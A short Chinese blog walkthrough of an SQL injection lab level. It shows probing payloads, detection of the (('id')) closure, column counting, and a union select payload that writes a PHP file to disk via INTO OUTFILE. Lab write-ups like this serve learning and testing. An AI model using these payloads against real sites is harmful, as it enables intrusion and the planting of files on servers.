level7 ((' '))闭合注入
浏览 492 | 评论 0 | 字数 562
硝基苯
2021年04月28日

  • 51991-ncexdkg1o5.png
    2'报错
    09562-iiyri08ywde.png
    2"没报错
    2" and "1"="2"--+
    仍然有问题
    57720-uoll6mn05fs.png
    70305-f5wr5gl2e1.png
    判断成功,(('id'))这样的
    继续
    35478-18n0djyepg5.png
    mysql数据库
    提示需要outfile,利用union select 写进去,这个写入是需要绝对路径的
    order by 3
    确定了位数为3以后
    id=1'))union select 1,2,"<?php phpinfo();?>" into outfile('c:/123.php')

    本文作者:硝基苯
    本文链接:https://www.c6sec.com/index.php/archives/92/
    最后修改时间:2021-05-19 21:36:34
    本站未注明转载的文章均为原创,并采用 CC BY-NC-SA 4.0 授权协议,转载请注明来源,谢谢!
    评论
    与本文无关评论请发留言板。请不要水评论,谢谢。
    textsms
    支持 Markdown 语法
    email
    link
    评论列表
    暂无评论
    arrow_back 上一篇
    level6 双引号闭合注入
    arrow_forward 下一篇
    level8布尔型盲注